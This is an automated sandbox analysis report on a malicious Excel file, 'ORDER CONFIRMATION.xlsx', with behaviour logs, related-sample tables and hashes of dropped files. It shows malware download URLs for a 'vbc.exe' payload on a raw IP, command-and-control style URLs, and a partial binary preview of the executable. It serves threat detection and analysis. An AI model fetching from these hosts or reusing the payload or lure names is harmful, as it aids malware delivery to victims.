                                                                                      		americanstonesusa.comCanada
                                                                                      		16276OVHFRtrue

                                                                                      General Information

                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                      Analysis ID:483668
                                                                                      Start date:15.09.2021
                                                                                      Start time:11:15:16
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 17m 57s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:light
                                                                                      Sample file name:ORDER CONFIRMATION.xlsx
                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                      Number of analysed new started processes analysed:12
                                                                                      Number of new started drivers analysed:2
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.expl.evad.winXLSX@12/19@22/4
                                                                                      EGA Information:Failed
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 23.7% (good quality ratio 22.8%)
                                                                                      • Quality average: 69.8%
                                                                                      • Quality standard deviation: 28.9%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 97%
                                                                                      • Number of executed functions: 0
                                                                                      • Number of non-executed functions: 0
                                                                                      Cookbook Comments:
                                                                                      • Adjust boot time
                                                                                      • Enable AMSI
                                                                                      • Found application associated with file extension: .xlsx
                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                      • Attach to Office via COM
                                                                                      • Scroll down
                                                                                      • Close Viewer
                                                                                      Warnings:
                                                                                      Show All
                                                                                      • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                      • TCP Packets have been reduced to 100
                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      11:15:46API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                                                                                      11:15:48API Interceptor125x Sleep call for process: vbc.exe modified
                                                                                      11:16:22API Interceptor229x Sleep call for process: ipconfig.exe modified
                                                                                      11:17:11API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      198.23.212.143ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                                                                      • 198.23.212.143/restore/vbc.exe
                                                                                      VINASHIP STAR.xlsxGet hashmaliciousBrowse
                                                                                      • 198.23.212.143/hkcmd/vbc.exe
                                                                                      MV NORDSPRING.xlsxGet hashmaliciousBrowse
                                                                                      • 198.23.212.143/ibm/vbc.exe
                                                                                      192.99.131.252UiUIvFRxA8.exeGet hashmaliciousBrowse
                                                                                      • www.americanstonesusa.com/nthe/?pF=TiWkgH4RkF7GI6/xmtcRQySnot/hSP0U84AJ42MHKZz+hx9kgl2ssvJW7++40TiQRwdDqjcF6A==&OZU=kh_XEVoH4
                                                                                      IDol28opjZ.exeGet hashmaliciousBrowse
                                                                                      • www.americanstonesusa.com/nthe/?Uzrhst=U4UTr&JBth_0D=TiWkgH4RkF7GI6/xmtcRQySnot/hSP0U84AJ42MHKZz+hx9kgl2ssvJW79Sooi+rWF0S

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      www.aedenpure.comQYUNlRkkn1.exeGet hashmaliciousBrowse
                                                                                      • 217.160.0.177
                                                                                      www.tomrings.comSKMBT69150632L.exeGet hashmaliciousBrowse
                                                                                      • 162.0.214.58
                                                                                      New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                      • 162.0.214.58
                                                                                      statement.exeGet hashmaliciousBrowse
                                                                                      • 162.0.214.58
                                                                                      Ohki Blower Skid Base Enquiry 052521.exeGet hashmaliciousBrowse
                                                                                      • 162.0.214.58
                                                                                      Wire Payment Of $35,276.70.exeGet hashmaliciousBrowse
                                                                                      • 162.0.214.58
                                                                                      cname.landingi.com0OBKA8AwTn.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      ZbpMqzUXVN.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      PO_IMG_13072021_item.exeGet hashmaliciousBrowse
                                                                                      • 52.212.68.12
                                                                                      47mAsp9IER.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      U03c2doc.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      scan-copy059950059pdf.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      SKMBT_C224307532DL23457845_Product Order doc.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      Descripciones de oferta de productos MACIILIAS SRL doc.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      a449cc12_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                      • 52.212.68.12
                                                                                      Dokument Nota odbiorcza IMI FFPT-2019223912003_2021 doc.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      Documento de transfer#U00eancia banc#U00e1ria _2021doc.exeGet hashmaliciousBrowse
                                                                                      • 52.212.68.12
                                                                                      TSVINCCU21021642.exeGet hashmaliciousBrowse
                                                                                      • 52.212.68.12
                                                                                      SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      SWIFT COPY.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      PROFORMA INVOICE.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      Paymonth invoice.exeGet hashmaliciousBrowse
                                                                                      • 54.77.19.84
                                                                                      Product list.xlsxGet hashmaliciousBrowse
                                                                                      • 108.128.238.226
                                                                                      WaybillDoc_6848889025.xlsxGet hashmaliciousBrowse
                                                                                      • 108.128.238.226

                                                                                      ASN

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      AS-COLOCROSSINGUSPedido.xlsxGet hashmaliciousBrowse
                                                                                      • 172.245.26.190
                                                                                      #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsxGet hashmaliciousBrowse
                                                                                      • 23.95.85.181
                                                                                      09142021_PDF.vbsGet hashmaliciousBrowse
                                                                                      • 23.94.82.41
                                                                                      Swift Mt103.xlsxGet hashmaliciousBrowse
                                                                                      • 23.95.13.175
                                                                                      vkb.xlsxGet hashmaliciousBrowse
                                                                                      • 192.3.13.11
                                                                                      Transfer Swift.xlsxGet hashmaliciousBrowse
                                                                                      • 172.245.26.190
                                                                                      ORDER 5172020.xlsxGet hashmaliciousBrowse
                                                                                      • 198.12.84.109
                                                                                      REF_MIDLGB34.xlsxGet hashmaliciousBrowse
                                                                                      • 23.94.159.208
                                                                                      proforma invoice.xlsxGet hashmaliciousBrowse
                                                                                      • 192.3.141.149
                                                                                      Swift_Mt103.xlsxGet hashmaliciousBrowse
                                                                                      • 23.95.13.175
                                                                                      PO-80722 .xlsxGet hashmaliciousBrowse
                                                                                      • 198.12.84.109
                                                                                      MT103-Swift Copy.xlsxGet hashmaliciousBrowse
                                                                                      • 198.46.199.203
                                                                                      Items_quote.xlsxGet hashmaliciousBrowse
                                                                                      • 172.245.26.145
                                                                                      Usd_transfer.xlsxGet hashmaliciousBrowse
                                                                                      • 172.245.26.145
                                                                                      REF_MIDLGB34.xlsxGet hashmaliciousBrowse
                                                                                      • 23.94.159.208
                                                                                      ORDER RFQ1009202.xlsxGet hashmaliciousBrowse
                                                                                      • 23.95.85.181
                                                                                      msn.xlsxGet hashmaliciousBrowse
                                                                                      • 198.12.127.217
                                                                                      swift.xlsxGet hashmaliciousBrowse
                                                                                      • 198.46.199.171
                                                                                      Additional Order Qty 197.xlsxGet hashmaliciousBrowse
                                                                                      • 198.12.107.117
                                                                                      DHL Cargo Arrival.xlsxGet hashmaliciousBrowse
                                                                                      • 172.245.26.190
                                                                                      OVHFRqy2t7MIRoi.exeGet hashmaliciousBrowse
                                                                                      • 92.222.145.236
                                                                                      ORDER 5172020.xlsxGet hashmaliciousBrowse
                                                                                      • 144.217.61.66
                                                                                      zB34E25PZM.exeGet hashmaliciousBrowse
                                                                                      • 87.98.185.184
                                                                                      USD INV#1191189.xlsxGet hashmaliciousBrowse
                                                                                      • 213.186.33.5
                                                                                      mipsGet hashmaliciousBrowse
                                                                                      • 54.37.203.235
                                                                                      lEsEX3McwH.exeGet hashmaliciousBrowse
                                                                                      • 51.254.69.209
                                                                                      5cv9ajEWlIGet hashmaliciousBrowse
                                                                                      • 51.79.103.19
                                                                                      oAQ0OaThsMGet hashmaliciousBrowse
                                                                                      • 213.251.181.247
                                                                                      ORDER 5172020.xlsxGet hashmaliciousBrowse
                                                                                      • 144.217.61.66
                                                                                      New_PO0056329.xlsxGet hashmaliciousBrowse
                                                                                      • 164.132.216.38
                                                                                      Z9GkJvygEk.exeGet hashmaliciousBrowse
                                                                                      • 149.56.94.218
                                                                                      RZAcKBlQo0.exeGet hashmaliciousBrowse
                                                                                      • 51.89.143.152
                                                                                      F1MwWrwBR7.exeGet hashmaliciousBrowse
                                                                                      • 51.89.143.157
                                                                                      Ernest_Skye_Mitchell.htmlGet hashmaliciousBrowse
                                                                                      • 167.114.119.127
                                                                                      mDkCoW1yzV.exeGet hashmaliciousBrowse
                                                                                      • 51.89.96.41
                                                                                      Payment voucher. pdf.................gz.exeGet hashmaliciousBrowse
                                                                                      • 51.222.134.241
                                                                                      5siADx4Pdz.exeGet hashmaliciousBrowse
                                                                                      • 51.89.96.41
                                                                                      9e5SOQ1wPzGet hashmaliciousBrowse
                                                                                      • 139.99.135.131
                                                                                      7LqDcyRJiNGet hashmaliciousBrowse
                                                                                      • 139.99.135.131
                                                                                      EEU2sTtvahGet hashmaliciousBrowse
                                                                                      • 139.99.135.131

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:downloaded
                                                                                      Size (bytes):556544
                                                                                      Entropy (8bit):7.182791197610268
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:7WHCM2K4Cz8liFBdgtM6lf2vo45Rm5fv1zCln:h3CzeiDdIMAfEofftzk
                                                                                      MD5:989933E361010648C467C6D7B6C2D812
                                                                                      SHA1:3BD47D097B8CD69083445EB0417B0059FA806542
                                                                                      SHA-256:34A89EDA5DD4AEF3EFB096011F27BBA7354B4C624D5DC01F4B43A18AC42D6AF4
                                                                                      SHA-512:F98B8337F527B49A4E5BD659CD6264D22F43C31EAAB55CCA4BF79EE2C5C5405D5CD78D1176759A0E0287E5FEB82675EF0D73DDA918FB9289ACC9D84DA466C60F
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:low
                                                                                      IE Cache URL:http://198.23.212.143/ddr/vbc.exe
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6...............0..t.............. ........@.. ....................................@.................................x...O...................................\................................................ ............... ..H............text....s... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B........................H........?..._......o...................................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C03C88C.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):8815
                                                                                      Entropy (8bit):7.944898651451431
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24B64F4E.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):84203
                                                                                      Entropy (8bit):7.979766688932294
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                                                                                      MD5:208FD40D2F72D9AED77A86A44782E9E2
                                                                                      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                                                                                      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                                                                                      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F791AF7.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):85020
                                                                                      Entropy (8bit):7.2472785111025875
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                      MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4D4B1A7A.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):49744
                                                                                      Entropy (8bit):7.99056926749243
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4EA9D4E2.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):14198
                                                                                      Entropy (8bit):7.916688725116637
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                                                                                      MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                                                                                      SHA1:72CA86D260330FC32246D28349C07933E427065D
                                                                                      SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                                                                                      SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CBE2925.jpeg
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                                                                      Category:dropped
                                                                                      Size (bytes):8815
                                                                                      Entropy (8bit):7.944898651451431
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                                                                      MD5:F06432656347B7042C803FE58F4043E1
                                                                                      SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                                                                      SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                                                                      SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                                                                      Malicious:false
                                                                                      Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F46F433.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):33795
                                                                                      Entropy (8bit):7.909466841535462
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                                                                                      MD5:613C306C3CC7C3367595D71BEECD5DE4
                                                                                      SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                                                                                      SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                                                                                      SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                                                                                      Malicious:false
                                                                                      Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7383DB7B.png
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):49744
                                                                                      Entropy (8bit):7.99056926749243
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                                                                      MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                                                                      SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                                                                      SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                                                                      SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                                                                      Malicious:false
